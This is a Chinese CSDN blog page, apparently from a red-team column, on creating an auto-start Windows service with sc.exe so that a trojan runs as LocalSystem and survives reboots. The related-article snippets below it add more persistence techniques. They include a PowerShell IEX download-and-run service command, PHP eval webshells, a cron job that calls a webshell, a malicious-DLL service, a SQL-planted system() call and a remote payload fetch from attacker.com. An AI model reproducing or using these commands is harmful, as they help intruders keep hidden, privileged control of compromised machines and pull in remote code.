SC实现隐藏Windows服务维持权限

最新推荐文章于 2024-10-15 23:20:16 发布
最新推荐文章于 2024-10-15 23:20:16 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: 红蓝对抗 文章标签: windows 服务器 系统安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XunanSec/article/details/125058980
版权

简介:

sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用scPowershell程序来隐藏服务,搭到长期维持权限的效果。

创建服务

创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行

sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem

添加个描述

sc description demo "tu3k.cn"

这时服务器重启会自启动上线,手动启动也可以上线,不过有时候手动可能会出错,但是不影响上线。

成功上线

删除进程命令sc delete demo

<
最低0.47元/天 解锁文章
Windows权限维持技巧之利用安全描述符隐藏后门服务
weixin_44747030的博客
05-02 1729
Windows权限维持技巧之隐藏服务 0x01 前言 在内网渗透的时候为了防止目标关机重启等问题导致权限丢失,会采用将后门程序注册为自启动的服务(windows服务会在开机时自动启动),让木马跟随服务的启动来回连我们的C2服务器,而在将木马注册为服务时,可以在注册表中查看到木马的文件路径,下面将通过安全描述符(SSDL)来隐藏注册表中的值。 0x02 原理 安全描述符是windows访问控制模型的一部分,其中包含了与安全对象关联的安全信息。 SDDL由4个部分组成 DACL(D)-表示自主访问控制列表
【实战】服务隐藏与排查 | Windows 应急响应
jijisaq的博客
03-26 1625
攻击者通过创建服务进行权限维持过程中,常常会通过一些手段隐藏服务,本文主要演示通过配置访问控制策略来实现隐藏的方式以及排查方法的探索不包含通过修改内存中链表进行隐藏的方式。
服务方式隐藏
laiqun_ai的专栏
05-26 1060
1. 在CMD 下输入 sc create sys binPath= “C:\Windows\System32\com\Svchost.exe -service” start= auto DisplayName= “System service“ (以上路径可更改) 复制 CCPROXY 目录内所有文件至C:\WINDOWS\SYSTEM32\COM   并改CCPROXY.EXE 名称为:s
Windows权限维持之利用安全描述符隐藏服务后门
Longwaer
01-11 929
学习Windows权限维持之利用安全描述符隐藏服务后门技术,更快知晓权限维持的妙用。
windows系统服务管理命令sc
zengliguang的专栏
10-06 854
sc可以用于管理系统服务、计划任务、系统日志等方面,是不可或缺的神器。
检测并禁用隐藏服务
~缘份天空~
05-16 768
隐藏服务的概念是由hxdef 和rootkit这些后门工具提出的。这些后门工具通过挂钩系统本地调用来隐藏自己,原本通过调用Windows API调用查看系统服务的企图都是徒劳的。所以这时的系统是不可靠的,不值得信任的。目前针对查找隐藏服务的工具已经有很多,比如IceSword,knlsc,FHS等等。虽然这些软件都是免费的,但是它们到目前为止都不是开源,所以将自己的实现版本展示出来,正如knlsc
利用安全描述符隐藏服务后门进行权限维持1
08-03
### 利用安全描述符隐藏服务后门进行权限维持 #### 概述 在网络安全领域,权限维持是一项关键技能,特别是在渗透测试过程中。本文将详细解释如何通过修改服务安全描述符(Security Descriptor Definition ...
windows权限维持汇总
LINGX5的博客
08-27 1073
msdtc.exe是微软分布式传输协调程序。该进程调用系统Microsoft Personal Web Server和Microsoft SQLServer。该服务用于管理多个服务器。msdtc.exe是一个并列事务,是分布于两个以上的数据库,消息队列,文件系统或其他事务保护资源管理器,删除要小心。对应服务MSDTC,全称Distributed Transaction Coordinator,Windows系统默认启动该服务对应进程msdtc.exe,位于%windir%system32。
Windows权限维持
A526847的博客
05-24 1153
隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
2024年最新Windows权限维持技术总结、复现_cs权限维持网络安全开发技术总结
2401_84264692的博客
05-06 975
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
c#隐藏/显示Windows任务栏
sohighthesky的专栏
04-16 1476
Windows的任务栏实际上是一个没有标题的窗体,所以只要找到这个窗体,就能隐藏和显示了 [DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)] static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChi
window权限维持——利用安全描述符隐藏服务后门进行权限维持
mingyqf的博客
02-18 800
操作可参考:https://blog.csdn.net/nicai321/article/details/122424652 侵删 原创 oulaa [宽字节安全] 通过注册服务创建后门 将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法,通常可以通过sc或者powershell来进行创建。 cmd创建自启动服务 sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\aa\Desktop\beacon.exe
权限维持小结
qq_61475980的博客
03-19 855
的 ST,在 Kerberos 认证的第三步,Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求,Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST,从而获得Session Key。该攻击方式其实是一种后门的形式,属于第二次进行攻击的方法。把域控管理员的SID加入到 其他某个恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改域账户一直存在。
WGCLOUD如何隐藏windows系统的agent窗口运行(注册系统服务
jiangnanfengyue的博客
04-13 494
使用NSSM将agent注册为windows系统服务说明 使用NSSM将agent注册为windows系统服务说明 - WGCLOUDhttps://www.wgstart.com/help/docs32.html
【实战】服务隐藏与排查 Windows 应急响应
m0_61068496的博客
04-09 852
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
权限维持篇---Windows权限维持--隐藏
永不垂头的博客
04-29 1400
权限维持篇—Windows权限维持隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
探索Windows隐藏功能:你不一定知道的五大秘密
m0_67484548的博客
10-15 1298
探索Windows隐藏功能:你不一定知道的五大秘密
Windows远控之权限维持
qax
11-23 1465
Windows权限维持 一丶建立系统服务 获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。 1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。 sc create "nuoyan" binpath= "c:\accc.exe" sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/
windows服务管理——sc / net 操作区别汇总
youxidonxx的专栏
03-01 1001
命令行中操作服务时,时常用到sc或者是net xxx,这2者有着一定的区别,以下为汇总的情况 1 从使用对象来区分 https://blog.csdn.net/xhw035/article/details/50976220 1、net用于打开没有被禁用的服务 2、用sc可打开被禁用的服务 2 从操作结果来看 https://superuser.com/questions/31516...
webshell权限维持
最新发布
03-21
<think>好的,用户想了解WebShell的权限维持方法或技巧。首先,我需要回忆一下常见的WebShell权限维持技术。根据之前的引用内容,比如引用[1]提到了Linux的隐藏技术,引用[2]提到了权限维持隐藏技术,而引用[4]则涉及PHP的ADS文件包含。可能需要结合这些信息来组织答案。 首先,我应该分点回答,结构清晰。权限维持通常包括隐藏、持久化、混淆等方法。对于WebShell来说,常见的技巧可能包括文件隐藏、进程隐藏、定时任务、数据库存储等。 然后,引用中的例子,比如ADS(Alternate Data Streams)在Windows中的使用,如引用[4]提到的PHP包含ADS文件,这可以用来隐藏WebShell。此外,Linux下的隐藏技术如修改文件属性或使用隐藏目录,如引用[1]提到的执行命令隐藏进程或文件。 另外,持久化方法可能包括添加启动项、cron作业、或者服务,如引用[3]提到的Windows中的DLL劫持或服务重启。对于WebShell,可能还会利用数据库存储恶意代码,或者利用框架的特性来维持权限。 需要确保每个技术点都有相应的引用支持,比如文件隐藏部分引用[4]和[1],进程隐藏引用[1]和[2],持久化引用[3]和[2]。同时,要提供具体的例子,比如PHP的include用法,或者Linux的touch .test.php隐藏文件。 此外,用户可能需要了解如何检测和防范这些技术,所以相关问题可以涉及检测方法和防御措施。要确保回答覆盖不同操作系统,如Linux和Windows,并区分不同的Web语言,如PHP、ASP等。 最后,检查是否符合格式要求,使用正确的LaTeX,没有数学公式所以可能不需要,但如果有变量或代码,要用代码块。同时生成的相关问题要围绕WebShell权限维持的扩展,比如具体技术细节、检测方法、跨平台差异等。</think>### WebShell权限维持方法与技巧 WebShell权限维持技术旨在通过隐藏、持久化和混淆等手段,确保攻击者长期控制受感染系统。以下是常见方法分类及实例说明: --- #### 一、文件隐藏技术 1. **Alternate Data Streams (ADS)** 在Windows系统中,利用NTFS文件系统的ADS特性隐藏WebShell内容。例如将恶意代码附加到正常文件中: ```cmd echo "<?php @eval($_POST['cmd']);?>" > index.php:hidden.jpg ``` 通过PHP包含该ADS文件即可执行恶意代码: ```php <?php include('index.php:hidden.jpg'); ?> // 引用[4] ``` 2. **隐藏文件/目录** - **Linux**:以`.`开头的文件或目录默认隐藏,例如: ```bash touch .webshell.php // 引用[1] ``` - **Windows**:通过设置文件属性隐藏: ```cmd attrib +h webshell.php ``` --- #### 二、持久化机制 1. **定时任务(Cron Jobs)** 在Linux中通过Cron定时访问WebShell以维持活跃状态: ```bash crontab -e * * * * * curl http://target.com/webshell.php >/dev/null 2>&1 // 引用[2] ``` 2. **服务/启动项注入** - **Windows**:通过注册表或服务加载恶意DLL: ```cmd sc create BackdoorService binPath= "C:\malware.dll" start= auto // 引用[3] ``` - **Linux**:修改`/etc/rc.local`或Systemd服务文件实现自启动。 3. **数据库存储** 将WebShell代码写入数据库字段,通过动态加载执行: ```sql UPDATE wp_posts SET post_content = '<?php system($_GET["cmd"]);?>' WHERE ID = 1; ``` --- #### 三、混淆与反检测 1. **代码编码/加密** 使用Base64、Gzip或自定义加密算法混淆WebShell代码: ```php <?php eval(gzinflate(base64_decode('...'))); ?> ``` 2. **动态加载技术** 通过外部资源远程加载恶意代码,降低静态检测概率: ```php <?php file_put_contents('tmp.php', file_get_contents('http://attacker.com/payload.txt')); include('tmp.php'); ?> ``` --- #### 四、进程/网络隐藏 1. **进程伪装** 修改进程名为常见系统进程(如`apache2`或`nginx`)以逃避检测[^2]。 2. **端口复用** 复用Web服务器端口(如80/443)进行通信,避免触发防火墙告警。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值